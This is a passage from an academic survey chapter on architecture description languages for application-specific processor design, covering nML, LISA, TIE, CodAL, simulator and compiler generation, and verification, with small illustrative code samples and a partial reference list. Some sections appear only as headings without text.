in the tool flow. The net result is an ASIP designed via additions to the core ISA.
Examples of ISA extension ADLs include Cadence/Tensilica TIE, Synopsys
ARC APEX, ANDES ACE, and Codasip CodAL.
Characteristics of ADLs
Key ADLs
MIMOLA
MIMOLA is one of the oldest ADLs, predating the “classical” 1990s period by more
than a decade (Marwedel 1979) and with continued development for two decades
(Leupers and Marwedel 1998). It was developed at the University of Dortmund,
Germany, and originally proposed for microarchitecture design. As befits the ADL
concept, with MIMOLA the same description can be used for synthesis, simulation,
test generation, and compilation. Its tool chain included the MSSH hardware
synthesizer, the MSSQ code generator, the MSST self-test program compiler, the
MSSB functional simulator, and the MSSU RT-level simulator, and MIMOLA has
also been used by the RECORD (Leupers and Marwedel 1998) compiler.
The MIMOLA description is in three parts: the algorithm to be compiled,
the target processor model, and additional linkage and transformation rules. The
software part is an algorithm description using a PASCAL-like syntax for appli-
cation programs. The target processor model uses a component netlist to define a
microarchitecture. The compiler uses the “linkage” information to define important
modules such as program counter and instruction memory.
EXPRESSION
nML
nML was created at the Technical University of Berlin, Germany (Freericks 1993),
and originally supported software tool generation from behavioral descriptions,
more than hardware generation. However, over its long history as enumerated above,
its capabilities were extended by Target Compiler Technologies (Goossens et al.
2006), and in the form of the Synopsys ASIP designer (Synopsys ASIP Designer),
where it eventually ended up, it is a large part of a complete and sophisticated
commercial ASIP generation system.
In its early days, nML was used by code generators CBC (Fauth and Knoll 1993)
and CHESS (Lanneer et al. 1995) and instruction-set simulators – what was called
CHECKERS (Goossens et al. 2006). The CHESS/CHECKERS environment was
used for automatic and efficient software compilation and instruction-set simulation,
but was extended to support HDL generation and test program generation (Goossens
et al. 2006).
Very early in ADL history, the nML developers recognized the fact that several
instructions share common properties, which could help make the final nML
description compact and simple. Therefore, nML uses a hierarchical scheme to
describe instruction sets. The instructions are the topmost elements in the hierarchy.
The intermediate elements of the hierarchy are partial instructions (PI). Two
composition rules, AND-rule and OR-rule, are used to establish relationships
between elements. The AND-rule groups several PIs into a larger PI and the OR-
rule enumerates a set of alternatives for one PI. Since instruction definitions in nML
are thus in the form of an and-or tree, each possible traversal from the root to the
leaf node of the tree gives an actual instruction.
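A schematic sketch in the style of (Sim-)nML illustrates the idea; keywords and attribute syntax vary across nML dialects, so this fragment is indicative rather than definitive:

op instruction = alu_instr | mem_instr       // OR-rule: enumerate alternative PIs
op alu_instr(d: card(4), s: card(4))         // AND-rule: compose a PI from its fields
  syntax = format("add r%d, r%d", d, s)      // assembly syntax
  image  = format("0000%4b%4b", d, s)        // binary encoding
  action = { R[d] = R[d] + R[s]; }           // behavior

Each root-to-leaf traversal of the resulting and-or tree (here, instruction resolving to alu_instr with concrete register fields) denotes one actual instruction.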
Early nML also captured the structural information used by the ISA. For example,
storage units were declared since they are visible to the instruction set. nML
supported three types of storage: RAM, register, and transitory storage. Transitory
storage refers to machine state that is retained only for a limited number of cycles.
Computations had no delay in the nML timing model; only storage units had delay.
Instruction delay slots were modeled by introducing storage units as pipeline
registers, and the result of a computation was propagated through these registers
in the behavior specification.
Early nML usage had a number of limitations that made it difficult to model
complicated constraints found in DSPs with irregular instruction level parallelism
or VLIW processing with multiple issue slots. A detailed review of nML from 1997
(Hartoog et al. 1997) discusses some of those limitations.
However, in its use by Target Compiler Technologies and then by Synopsys as a
fundamental technology for ASIP design, its capabilities were extended, and
combined with other aspects of ASIP Designer, to allow a wide variety of ASIPs
with various architectures to be designed. A good overview of nML as currently
used in ASIP Designer is available in Bo and Willems (2015).
LISA
Language for Instruction Set Architecture (LISA) (Meyr et al. 2008) was developed
at RWTH Aachen University, Germany, originally to help in developing fast
simulators (Nohl et al. 2002). By trading off speed and accuracy constraints,
different modes of instruction-set simulator, for example, compiled, interpretive,
and just-in-time cache-compiled (JIT-CC), could be generated. LISA could be used
in a stepwise fashion to gradually increase the level of detail: a designer could
start with an instruction-accurate LISA description, carry out early design space
exploration, and then refine the design to a detailed, cycle-accurate model. To
support this kind of design, application profiling, automatic instruction-set encoding
(Nohl et al. 2003), as well as custom instruction identification (Leupers et al. 2006)
played an important role. From a cycle-accurate LISA description, optimized, low-
power RTL (Chattopadhyay et al. 2006a; Chattopadhyay et al. 2006b) generation
was possible. LISA also provided a methodology for automated test pattern and
assertion generation (Chattopadhyay et al. 2006c) and was also used to generate
retargetable C compilers (Hohenauer et al. 2004; Wahlen et al. 2003).
During the LISATek era, the language was extended to cover a wide range of
processor architectures such as VLIW, weakly programmable ASICs (Wang et al.
2012), Coarse-Grained Reconfigurable Architectures (CGRAs) (Chattopadhyay
et al. 2008), and partially reconfigurable ASIPs (rASIPs) (Chattopadhyay et al.
2009). However, after acquisition by Synopsys, and its further acquisition of Target
Compiler Technologies with nML in 2014, specific aspects of LISA technology
were subsumed into the ASIP Designer toolset, which is heavily based on nML, and
any specific LISA-based capabilities are no longer easy to find in ASIP Designer.
PEAS
PEAS, which went through several generations (PEAS-I, PEAS-II, and PEAS-III)
in the 1990s (Itoh et al. 2000a; Itoh et al. 2000b), was somewhat unique in being an
ASIP approach that emerged from academic work in Japan. It was the basis for a
commercial spin-out, ASIP Meister (Hassan and Imai 2005), but this was not very
successful. In addition, although PEAS provided an ASIP design environment, it
was primarily GUI-based and did not share much in the way of ADL formalisms.
Tensilica TIE
pipeline (NX). An example TIE description for a 4-way, 16-bit vector integer add
instruction is shown in the following:
regfile simd64 64 16 v    // 16-entry register file that is 64 bits wide
operation vec4_add16 {out simd64 res, in simd64 A, in simd64 B} { } {
    wire [15:0] rtmp1 = A[15: 0] + B[15: 0];
    wire [15:0] rtmp2 = A[31:16] + B[31:16];
    wire [15:0] rtmp3 = A[47:32] + B[47:32];
    wire [15:0] rtmp4 = A[63:48] + B[63:48];
    assign res = { rtmp4, rtmp3, rtmp2, rtmp1 };
}
More detailed descriptions of TIE are available in Sanghavi and Andrews (2008)
and in Bailey and Martin (2010, Chapter 6).
The design space exploration flows supported in the Xtensa and TIE toolset
present opportunities for exploiting data-level parallelism, instruction-level paral-
lelism using Xtensa Flexible Length Instruction eXtensions (FLIX, which is similar
to VLIW but with better encoding opportunities since it supports multiple formats),
customizable storage, and increased data bandwidth. For example, to have increased
data bandwidth, processor designers can add multiple I/O interfaces (ports, queues,
lookups) to the Xtensa processor for fixed-latency data transfer. Instructions created
using TIE implicitly initiate one or multiple transactions over these interfaces, which
significantly increases I/O bandwidth. These can also be used to interface to external
dedicated hardware blocks which execute autonomously from the basic Xtensa
pipeline.
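As an illustrative sketch only (the interface names are hypothetical, and exact TIE syntax details may differ from this simplified form), a designer might declare queue interfaces and an operation that consumes and produces queue data implicitly:

queue INA  64 in     // 64-bit input queue interface
queue INB  64 in
queue OUTQ 64 out
operation vec4_add16_q { } {in INA, in INB, out OUTQ} {
    assign OUTQ = { INA[63:48] + INB[63:48], INA[47:32] + INB[47:32],
                    INA[31:16] + INB[31:16], INA[15: 0] + INB[15: 0] };
}

Issuing this instruction pops one element from each input queue and pushes the lane-wise 16-bit sums to the output queue, so data can stream through the processor without explicit load/store instructions.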
ARC APEX
Codasip CodAL
Codasip (Codasip) emerged during the third ADL era (the second industrial era) as
a commercial ASIP provider, with its own proprietary ASIP RISC cores, proprietary
ISA extension ADL CodAL (Codasip Architectural Language) (Přikryl 2020), and
GUI and toolset for defining and building ASIPs. Like many earlier ADLs, it was
based on academic work – in this case, done at Brno University of Technology, Czechia
(Trmac et al. 2010; Husár et al. 2010).
However, its proprietary approach was not successful, so in the middle of the era
it cleverly pivoted: it swapped out its proprietary RISC for RISC-V, which was
emerging as a new standard, defined a new family of RISC cores based on various
RISC-V extension bundles, and adapted CodAL to generate implementations of
new instruction extensions that fit into RISC-V architectural concepts.
In late 2021–early 2022, Codasip also began significant management changes
and expansion of R&D beyond its Brno, Czechia roots (Press Release 2021). It is
not clear whether its offering of RISC-V base cores, which users can extend using
CodAL, will be successful in the long term, but the pivot was clearly an important
part of corporate survival.
Codasip offers Codasip Studio (https://codasip.com/products/codasip-studio/)
as a GUI and toolset to convert base RISC-V configurations plus CodAL ISA
extensions into a buildable ASIP with software tool support. The following code
example shows a Multiply-Accumulate (MAC) instruction realized in CodAL, a
language that draws inspiration from ADLs like LISA:
element i_mac {
    use reg as dst, src1, src2;
    assembly {"mac" dst "," src1 "," src2};
    binary {OP_MAC dst src1 src2 0:bit[9]};
    semantics {rf[dst] += rf[src1] * rf[src2]};
}
Andes ACE
RISC-V Chisel
combination of conventional configurable RTL design for their basic CPUs and
DSPs, and their own ISA extension ADLs for adding new custom operations, rather
than anything based on Chisel.
ADL-Driven Methodologies
There are five areas of particular interest where ADL methodologies have made
major contributions in both academic research and the commercial domain; these are discussed in turn below.
As discussed previously, ADLs are used to specify processor and memory archi-
tectures and have been used to generate software tools including the compiler,
simulator, assembler, profiler, debugger, disassembler, hardware abstraction layer
(HAL) software, often software stacks and configured low-level software routines,
and libraries tuned to the processor configuration. Figure 2 shows an ADL-based
design space exploration flow. The application programs, usually written in C/C++
or in higher level libraries such as OpenCV, OpenCL, or Halide, are compiled to
the ISA and simulated, and the feedback is used to modify the ADL specification,
to explore the design space, with the goal of finding the best possible architecture
for the given set of application programs under various design constraints such as
performance, power, and area (PPA).
Drawn from the three eras of ADL development, there are many detailed
descriptions of software tool generation and associated design space exploration.
These include ISDL (Hadjiyiannis et al. 1997), Valen-C (Inoue et al. 1998),
MIMOLA (Leupers and Marwedel 1998), LISA (Meyr et al. 2008), nML (Freericks
1993), Sim-nML (Rajesh and Moona 1999), EXPRESSION (Halambi et al. 1999),
Synopsys ARC (Synopsys DesignWare ARC), RADL (Siska 1998), Synopsys
ASIP designer based on Target Compiler Technologies (Synopsys ASIP Designer),
Tensilica TIE (Cadence Tensilica), MDES (The MDES User Manual), Codasip
Studio, and ANDES.
Compilers Traditionally, software for embedded systems was hand-tuned in
assembly. However, it is not practical to develop software in assembly language
or to optimize it manually except for critical sections of the code. The use of
intrinsics embedded in C/C++ code can substitute for manual assembly to some
extent and is often as efficient, but in general, high-quality compilers that
produce optimized machine-specific code from a program specified in a high-level
language (HLL) such as C/C++ or Java are necessary to produce efficient software
within productivity and time budgets. There has been a lot of work on efficient
compilers for embedded systems
(Hohenauer et al. 2006, 2008; Goossens et al. 2006). In particular, given the rise
of ASIPs, new processor ISAs such as RISC-V, application-specific processing in
general, and new compilation approaches such as Clang/LLVM, the need to make
all good compilers retargetable has come to the fore (Goossens et al. 2006).
Use of ISA extension ADLs to complement a base ISA, as with ARC APEX,
Tensilica TIE, Codasip CodAL, and ANDES ACE, raises the question of where the
new custom instructions will come from.
Skilled designers, using the ADL ASIP tool capabilities and application profiling,
are usually a good source of new custom instructions. However, in the early to
late 2000s, there was considerable interest in automating this process. Custom
instruction identification, as a standalone problem, has been studied in depth
(Atasu et al. 2012; Pothineni et al. 2008; Biswas et al. 2007). For ISA extension to
an existing processor, there has been research on design flows (Leupers et al. 2006),
on hardware optimizations (Karuri et al. 2007), and on reconfigurable targets
(Karuri et al. 2008).
Perhaps more interesting are two developments that tried to commercialize this
approach. The Tensilica XPRES tool [(Goodwin and Petkov 2003), Chapter 8 of
reference 2, Chapter 6 of reference 84] automatically moved from single or
multiple application profiling runs to the generation of Tensilica TIE ADL code
extending operations in three ways: SIMD, instruction fusion, and instruction-
level parallelism (FLIX). The automatically generated TIE could be constrained to
land at different points along a performance-area Pareto curve, thereby facilitating
design tradeoffs. Equally interesting, the compiler could automatically make use of
the automatically generated instructions to speed up the code when compiling it,
without manual intervention, thus providing a high level of automation.
Another attempt was based on the work of Pozzi and Ienne [Chapter 7 of
reference 84], which formed the basis of a startup in Lugano, Switzerland, called
Mimosys (Brown and Epalza 2006).
Perhaps the most interesting conclusion from the Tensilica XPRES experience
was that despite generating potentially thousands of lines of ADL code for instruc-
tions that gave significant acceleration for a class of applications, the resulting code
was not really the basis for a commercial product by a design team. It was too
lengthy and complex, was not commented (so the links back to the kernels of the
applications were difficult to discern), and lacked enough generality to be a good
basis for future applications drawn from the domains used to generate the ADL
code.
of the internal pipeline and processor state and thus produce cycle-approximate
statistics or, with a very detailed pipeline and state model, cycle-accurate statistics.
There may be some difficulties accurately modeling instruction-level parallelism
and the interaction of external events such as interrupts and exceptions since
fundamentally every operation is executed serially, even if modeled as executing
in parallel. Similarly, accurately modeling the implications of various memory
accesses requires considerable simulation overhead, further slowing the simulation.
As will be seen, there are other approaches that tend to avoid the high overhead
of the interpreted ISS.
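To make that overhead concrete, the following is a minimal C sketch of an interpreted ISS step function (a hypothetical, loosely RISC-V-flavored encoding; not any particular tool's code). Every simulated instruction pays for fetch, decode, and dispatch:

#include <stdint.h>

typedef struct {
    uint32_t pc;
    uint32_t regs[32];
    uint8_t  mem[1 << 20];
} CpuState;

/* Illustrative field extraction for a RISC-V-like 32-bit encoding */
#define OPCODE(i) ((i) & 0x7f)
#define RD(i)     (((i) >> 7)  & 0x1f)
#define RS1(i)    (((i) >> 15) & 0x1f)
#define RS2(i)    (((i) >> 20) & 0x1f)

static uint32_t fetch32(const uint8_t *m, uint32_t pc) {
    return (uint32_t)m[pc] | ((uint32_t)m[pc + 1] << 8) |
           ((uint32_t)m[pc + 2] << 16) | ((uint32_t)m[pc + 3] << 24);
}

void interp_step(CpuState *s) {
    uint32_t insn = fetch32(s->mem, s->pc);  /* fetch */
    switch (OPCODE(insn)) {                  /* decode and dispatch */
    case 0x33:                               /* R-type ALU op, e.g., ADD */
        s->regs[RD(insn)] = s->regs[RS1(insn)] + s->regs[RS2(insn)];
        break;
    /* ... one case per target instruction ... */
    }
    s->pc += 4;                              /* simplified: branches not shown */
}

The switch-based dispatch and field extraction are repeated on every execution of the same instruction, which is precisely the cost the compiled approaches below try to remove.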
Compiled. In a compiled approach, each target instruction is translated into
a series of host machine instructions which emulate the function of each target
instruction and use and modify the simulated processor state.
If the target code is compiled into host code before running the simulator,
the complete processor fetch-decode-dispatch overhead is eliminated (this is static
compiled simulation). Alternative approaches will compile the code dynamically
when it is loaded; in this way, the overhead will be spread over repeated executions.
Compiled ISSs have been the subject of research (Zhu and Gajski 1999;
Pees et al. 2000; Cmelik and Keppel 1994; Witchel and Rosenblum 1996) and
commercial ASIP/ADL providers have also offered them. Synopsys ARC, for
example, offers nSIM, which is based on compiled ISS concepts, to complement
its xCAM Cycle-Accurate ISS model, which is generated by abstracting from the
processor RTL (https://www.synopsys.com/designware-ip/processor-solutions/arc-
development-tools/simulation-tools.html).
Interpreted and Compiled. Because interpreted ISSs are flexible but slow
due to instruction decoding and dispatch modeling, and compiled ISSs impose
a pre-runtime overhead to generate the static compiled-code simulation model,
researchers worked on methods to combine the advantages of both, such as “Just
in Time Compiled Code Simulation (JIT-CCS)” (Nohl et al. 2002) and “Instruction
Set Compiled Simulation (IS-CS)” (Reshadi et al. 2003).
In JIT-CCS, an instruction is compiled during runtime, just before the operation
needs to be executed, and the compiled information is cached so that when the
operation is encountered again in the instruction stream, it does not need to be
recompiled. In IS-CS, instruction decoding is done during compile time, and if
the code is run-time modified, the instruction is re-decoded in subsequent use. To
further reduce the overhead of the compilation process, the ISS framework might
execute an operation a few times in interpreted mode and only compile it once
it has detected that the operation is likely to be executed many times. Thus, very
infrequently executed instructions (or indeed, instructions that may not be executed
at all in a particular simulation run) are only interpreted and not compiled.
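A minimal sketch of the JIT-CC idea, reusing the CpuState and fetch32 of the interpreter sketch above (the decode() helper and the cache layout are hypothetical), caches decode results keyed by program counter so that repeated executions skip the expensive decode step:

typedef void (*SemanticsFn)(CpuState *s, uint32_t insn);

SemanticsFn decode(uint32_t insn);  /* hypothetical: maps an encoding to its handler */

typedef struct { uint32_t insn; SemanticsFn fn; } DecodeCacheEntry;
static DecodeCacheEntry cache[1 << 16];      /* direct-mapped, indexed by pc */

void jitcc_step(CpuState *s) {
    uint32_t insn = fetch32(s->mem, s->pc);
    DecodeCacheEntry *e = &cache[(s->pc >> 2) & 0xffff];
    if (e->fn == 0 || e->insn != insn) {     /* miss; also catches modified code */
        e->insn = insn;
        e->fn   = decode(insn);              /* expensive decode done only once */
    }
    e->fn(s, insn);                          /* cached semantics on every rerun */
    s->pc += 4;
}

The insn comparison on a hit is what lets run-time-modified code be re-decoded, as IS-CS also does at the instruction level.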
These techniques did not remain confined to academic research: commercial
ASIP/ADL companies adopted them to speed up their ISS simulation.
Tensilica, for example, introduced a “fast functional” simulation mode called
TurboXim (Augustine et al. 2009), which complements its cycle-accurate ISS mode
and greatly increases functional ISS performance for software developers.
Hybrid. Since software developers often do not need high accuracy in simulation
for a complete application run, hybrid simulation offers a capability to use functional
execution to quickly reach an area of interest and then switch to a detailed cycle-
accurate simulation mode to debug or study the detailed performance of a critical
area of code. Researchers developed such techniques (Kraemer et al. 2007), allowing
switching between cycle-accurate modeling and a functional mode that uses host-
based emulation.
The main issue with hybrid simulation is keeping the models of the processor
state in the two modes synchronized enough that switching does not introduce gross
inaccuracies. This can be done by restricting where switching may occur (e.g., at the
boundaries of a function) or by explicit state flushing and restoration techniques
performed just before switching.
The hybrid technique is also available in the commercial ASIP world (see, for
example, Chap. 6 of Bailey and Martin 2010), where it can also be used in a
different mode – statistical sampling between fast functional and cycle-accurate
mode, to allow performance predictions based on cycle-accurate execution to be
generated for the complete application running mostly in fast functional mode. As
with any technique, care must be taken to ensure that the predictions have reasonable
accuracy by ensuring that mode-switching is sufficiently random.
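A sketch of the sampling idea (the helper functions and the window/period constants are illustrative assumptions, not any vendor's API, and CpuState is reused from the earlier sketches): run mostly in fast functional mode, periodically simulate a randomized window cycle-accurately, and extrapolate total cycles from the sampled CPI:

/* Hypothetical helpers: each advances the simulation by n instructions. */
void run_functional(CpuState *s, uint64_t n);
uint64_t run_cycle_accurate(CpuState *s, uint64_t n);  /* returns cycles spent */
uint64_t random_near(uint64_t mean);                   /* randomized gap length */

uint64_t estimate_cycles(CpuState *s, uint64_t total_insns) {
    const uint64_t window = 10000;             /* cycle-accurate sample size */
    uint64_t insns = 0, cycles = 0, done = 0;
    while (done < total_insns) {
        uint64_t gap = random_near(1000000);   /* mostly fast functional mode */
        run_functional(s, gap);
        cycles += run_cycle_accurate(s, window);
        insns  += window;
        done   += gap + window;
    }
    /* extrapolate: sampled CPI applied to the whole run */
    return (uint64_t)((double)cycles / (double)insns * (double)total_insns);
}

Randomizing the gap length is what keeps the samples from synchronizing with periodic program behavior and biasing the estimate.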
Detailed PPA analysis of generated processors, and integration into an actual SoC,
needs synthesizable RTL. The two types of ADLs discussed earlier, complete ADLs
and ISA extension ADLs, do this in somewhat different ways. In the end,
however, much of the PPA of the generated processor depends on the degree to
which the designers take care to optimize the resulting core for their applications.
ISA-Extensible ADL In this approach, followed by most commercial
ASIP/ADL providers (e.g., Tensilica TIE, Synopsys ARC, Andes ACE, Codasip
CodAL), a base core architecture is configured through the selection or de-
selection of many different offered functional units, ISA packages, interfaces
such as memories, pipeline choices, etc., as discussed earlier. Complementing
this configuration is the designer addition of ADL-based ISA extensions, which
as noted can contain considerable extra processor resources (register files, vector
SIMD units, VLIW style slotting of duplicate functional units, etc.). Thus, in this
approach, the base processor once configured may not be extended at all, or may be
modestly extended with a few simple operations, or may be vastly extended with
complete vector SIMD processing units, so that the resulting generated HDL could
be 100% based on the supplier design, or anywhere from a few percent to 90%
or more based on designer ISA extensions. This is the basis of a “configurable,
extensible” processor offering.
As the percentage of customized ISA extensions rises, the difference between
an ISA-extensible ADL and a complete ADL begins to diminish. Nevertheless, as
will be seen, complete ADL approaches offer yet more flexibility in basic processor
architecture.
Under the hood, a supplier-provided ASIP/DSP may actually use the supplier's own
ISA extension ADL to generate much of the configured RTL code of the base
processor, the reason being the high quality of RTL code generation from an ADL.
In this scenario, libraries of preoptimized ADL code may be offered as part of the
toolset to give designers a quicker path to efficient RTL, more optimal than
external designs could achieve on their own. This follows the mantra that “the best
designers of ADL-based processors are often the internal supplier designers.”
Complete ADL Researchers and providers of complete ADL ASIP approaches
have offered more flexibility with this approach than the ISA extension ADL
concepts discussed previously, although, as mentioned, when user-defined ISA
extensions grow to be 90% of the processor, the distinction between the two
approaches is greatly diminished.
Nevertheless, complete ADL approaches offer designers more flexibility in
bottom-up ASIP design, because they do not restrict them to a preimplemented
pipeline and basic processor micro-architecture. Nor do they impose a predefined
base RISC ISA. Tools such as Synopsys ASIP designer (Synopsys ASIP Designer)
offer the designers a chance to completely define the pipeline, interfaces, and ISA
for the generated processor. In many deeply embedded applications (such as hearing
aids or audio processors), this ability to completely tune the resulting PPA of the
generated HDL may be a vital design criterion that outweighs the extra design time
needed to start from scratch.
Commercial providers of complete ADLs try to compensate for the steeper
learning curve when compared to ISA extension ADL approaches by providing
extensive example libraries. These give starting points in source code for users
to learn processor design from the ground up and to develop their own ground-
up designs. Synopsys ASIP designer, for example, provides examples ranging
from simple 16-bit RISC microcontrollers, through 32-bit microcontrollers, RISC-
V CPUs, DSPs from simple through SIMD through VLIW style, and a number of
ASIP designs for video, communications, FFT, JPEG encoding, image processing,
matrix operations, and Simultaneous Localization and Mapping (SLAM) (Synopsys
ASIP Designer).
Top-Down Verification
[Fig. 3 shows the top-down verification flow: properties/assertions generated from the ADL specification are checked by symbolic simulation; generated test patterns drive simulation of manually written RTL and of automatically generated RTL, with results matched; and two automatically generated RTL versions are compared by equivalence checking]
With ADLs, designers were able to develop executable specifications, either for
the complete processor or for a major portion of it, and this allows a top-down
verification flow to be developed (Mishra 2005; Chattopadhyay et al. 2006c) as
depicted in Fig. 3.
Verification based on ADLs may use two concepts: first, the ADL specification of
the processor is validated for completeness and integrity using a variety of methods,
and second, the ADL specification can be used to drive simulation-based verification
processes.
A validated ADL specification can be used as a golden model for top-down verifica-
tion flows. Such a top-down verification flow has been used in several contexts:
for example, functional test program generation, verification using equivalence
checking, and symbolic simulation.
Test generation for functional simulation-based verification of processors was
demonstrated in the early ADL eras using MIMOLA (Leupers and Marwedel 1998),
EXPRESSION (Mishra and Dutt 2004b), LISA (Chattopadhyay et al. 2006c), and
nML (Synopsys ASIP Designer). With EXPRESSION (Mishra and Dutt 2004b),
a model checking approach was used to automatically generate functional test
programs from the processor specification. This worked by generating a graph
model of the pipelined processor from the ADL and then creating test programs
to cover the behavior of the pipeline. Further work in this vein was reported for
EXPRESSION (Dang et al. 2009) and LISA (Chattopadhyay et al. 2006c).
A slightly different equivalence-checking-based verification approach from the
one presented in the previous section was suggested in Mishra (2005). Here, an
ADL-generated RTL model was compared to a hand-written RTL implementation of
the processor. The approach also generated properties that could be checked with
symbolic simulation.
Commercial design flows for ASIPs with ADLs generate many simulation-based
verification artifacts automatically or based on libraries of models supported in
the flow, and these can be useful for user-defined ISA extensions as well (Jani
et al. 2005). However, one can hardly say at this point in 2022 that the verification
problem has been solved, for hardware, software, or combinations thereof, despite
continued attention to the issues by EDA companies and design teams. As with
ADLs in general, academic research in formal verification has focused on new
constraints, such as security (Watson et al. 2019).
by using symbolic (#define) pattern names and mappings (e.g., select every
m-th element from an input vector set).
• Many DSPs share common subsets of operations used for basic vector
operations (adds, subtracts, shifts, multiplies, multiply-accumulates). Addition-
ally, some DSPs need complex datatypes and operations and some do not, while
all of them need real arithmetic. Some DSPs need FIR and FFT operations, and
some do not. By turning the definitions, properties, and implementations (in TIE
ADL) for these subsets into reusable libraries of operations in various classes,
many different types of DSPs could be created from a common option-based
design flow built on top of these libraries. (This is something the RISC-V creators
realized as well of course.)
• New ADL-based module definition capabilities could speed up the definition and
generation of lane-wise SIMD operations by declaring processing for one SIMD
lane and simply replicating it with an ADL construct. This avoided a number of
errors that could occur when the SIMD lanes needed to be manually generated in
the ADL (e.g., due to typos) and made the ADL code much easier to understand.
• Automated capabilities to define the verification requirements for each operation
class and to generate verification tests from these higher-level requirements were
introduced. Although this was done using tools and flows rather than in the ADL
itself, it is easy to see (especially given earlier work) that this would be better
added to the ADL as an additional set of representations or models.
• Finally, some fairly elaborate capabilities for documentation generation (e.g.,
HTML pages for every operation) were created. Many operations share common
templates and developing documentation entirely by hand is inefficient and error-
prone. The productivity increase by using automated flows was large.
The net impact of this kind of superset ADL flow was a further increase in design
and verification productivity – and thus, this would be a good set of directions for
future commercial ADL-based ASIP tools.
Conclusions
and most advances are the outgrowth of commercial entities. This is despite the
fact that radically new processor architectures and design approaches are not well
supported by ADLs. Perhaps academic research into new architectures will trigger
new academic research into ADLs, especially in hot domains such as Machine
Learning.
In the future, the lessons learned from the ADL evolution can prove beneficial for
adopting new high-level synthesis technology trends. Considering the emergence of
Machine Learning (ML) accelerators across various domains right now, it is only
natural to ask whether there are effective design automation methodologies
in place for automating the design of ML accelerators and what kind of parallels
can be drawn from the ADL research. The development of ADL-based design
flows coincided with the growth of wireless signal processing algorithms, which
differ in many requirements from ML tasks, most prominently in the data-driven
nature of ML computing. Therefore, for such tasks, which put emphasis on prudent
memory bandwidth management and demand extreme forms of parallelism, newer
forms of architecture and corresponding ADL-based tool flows can certainly be
imagined.
The overview started with Makimoto’s wave and the cycles of standardization
and customization. Since domain-specific computing is one of the few techniques
available to increase performance beyond the sputtering out of Moore’s Law and
Dennard scaling, it is entirely possible that domain-specific computing, with ADLs
forming the important backbone, will break the wave and keep the industry in
the customization cycle for a long time to come. The prediction of Chris Rowen,
founder of Tensilica, that “the processor is the NAND gate of the future” (Gries and
Keutzer 2005) may turn out to be the actual future, in no small part due to ADLs.
References
Amor HB, Bernier C, Prikryl Z (2021) A RISC-V ISA extension for ultra-low power IoT wireless
signal processing. IEEE Transactions on Computers, pp 1–1. https://doi.org/10.1109/TC.2021.
3063027
Andes Custom Extension. http://www.andestech.com/en/productssolutions/andes-custom-
extension/
Atasu K, Luk W, Mencer O, Ozturan C, Dundar G (2012) FISH: fast instruction synthesis for
custom processors. IEEE Trans Very Large Scale Integr Syst 20(1):52–65
Augustine S, Gauthier M, Leibson S, Macliesh P, Martin G, Maydan D, Nedeljkovic N, Wilson
B (2009) Chapter 7 Generation and use of an ASIP software tool chain. In: Wolfgang E,
Wolfgang M, Rainer D (eds) Hardware-dependent software: principles and practice. Springer,
Berlin/Heidelberg, Germany
Bailey B, Martin G (2010) ESL models and their application. Springer
Biswas P, Dutt ND, Pozzi L, Ienne P (2007) Introduction of architecturally visible storage in
instruction set extensions. Comp Aided Design Integrated Circuits Syst IEEE Trans 26(3):435–
446
Bit A (2020) 64-bit custom Math ISA in configurable 32-Bit RISC processor. In ICDSMLA 2019.
Springer, Singapore, pp 564–575
Bo W, Willems M (2015) Rapid architectural exploration in designing application-specific
processors. White Paper, Synopsys. https://www.synopsys.com/dw/doc.php/wp/architectural_-
exploration_designing_application_specific_processors.pdf
Grimblatt V, Ferré G, Rivet F, Jego C, Vergara N (2019) Precision agriculture for small to medium
size farmers – an IoT approach. In: 2019 IEEE international symposium on circuits and systems
(ISCAS), pp 1–5. https://doi.org/10.1109/ISCAS.2019.8702563
Gupta A, Pal A (2015) Accelerating SVM on ultra low power ASIP for high throughput streaming
applications. In: 2015 28th international conference on VLSI design. IEEE
Hadjiyiannis G, Hanono S, Devadas S (1997) ISDL: an instruction set description language for
retargetability. In Proceedings of the 34th annual design automation conference, DAC ‘97, pp
299–302
Halambi A, Grun P, Ganesh V, Khare A, Dutt N, Nicolau A. EXPRESSION: a language for
architecture exploration through compiler/simulator retargetability. In Design, automation and
test in Europe conference and exhibition 1999. Proceedings, pp 485–490, March 1999
Hartoog MR, Rowson JA, Reddy PD, Desai S, Dunlop DD, Harcourt EA, Khullar N (1997)
Generation of software tools from processor descriptions for hardware/software codesign. In
Proceedings of the 34th annual design automation conference, DAC ‘97, pp 303–306
Hassan MA, Imai M (2005) ASIP Meister: an ASIP design environment. DATE 2005 Univer-
sity Booth, https://www.edacentrum.de/system/files/files/veranstaltungen/2005/date05/ubooth/
descriptions/Description_sw_ASIP.pdf
Hohenauer M, Scharwaechter H, Karuri K, Wahlen O, Kogel T, Leupers R, Ascheid G, Meyr H,
Braun G, van Someren H (2004) A methodology and tool suite for C compiler generation from
ADL processor models. In Proceedings of the conference on design, automation and test in
Europe – Volume 2, DATE ‘04, 2004
Hohenauer M, Schumacher C, Leupers R, Ascheid G, Meyr H, Someren Hv (2006) Retargetable
code optimization with SIMD instructions. In CODES+ISSS ‘06: Proceedings of the 4th
international conference on hardware/software codesign and system synthesis. ACM, New
York, pp 148–153
Hohenauer M, Engel F, Leupers R, Ascheid G, Meyr H, Bette G, Singh B (2008) Retargetable code
optimization for predicated execution. In Proceedings of the conference on design, automation
and test in Europe, DATE ‘08, pp 1492–1497
Husár A, Trmac M, Hranac J, Hruska T, Masarík K (2010) Automatic C compiler generation from
architecture description language ISAC. MEMICS:47–53
Inoue A, Tomiyama H, Fajar E, Yasuura NH, Kanbara H (1998) A programming language for
processor based embedded systems. In Proc. of APCHDL, pp 89–94
Itoh M, Higaki S, Sato J, Shiomi A, Takeuchi Y, Kitajima A, Imai M (2000a) PEAS-III: an ASIP
design environment. In Computer design, 2000. Proceedings. 2000 international conference on,
pp 430–436
Itoh M, Takeuchi Y, Imai M, Shiomi A. Synthesizable HDL generation for pipelined processors
from a micro-operation description. IEICE Trans. Fundamentals, March 2000b
Jamma D et al (2016) Design exploration of ASIP architectures for the K-nearest neighbor
machine-learning algorithm. In: 2016 28th international conference on microelectronics (ICM).
IEEE
Jani D, Benson C, Dixit A, Martin G (2005) Chapter 18 Functional verification of configurable
embedded processors. In: Bailey B (ed) The functional verification of electronic systems: an
overview from various points of view. IEC Press, Chicago, US
Kalluri SS. Securing offload engines for a robust secure SoC system. https://semiengineering.com/
securing-offload-engines-for-a-robust-secure-soc-system/
Kammler D, Zhang D, Schwabe P, Scharwaechter H, Langenberg M, Auras D, Ascheid G, Mathar
R (2009) Designing an asip for cryptographic pairings over barreto-naehrig curves. In: Clavier
C, Gaj K (eds) Cryptographic hardware and embedded systems – CHES 2009. Springer, Berlin,
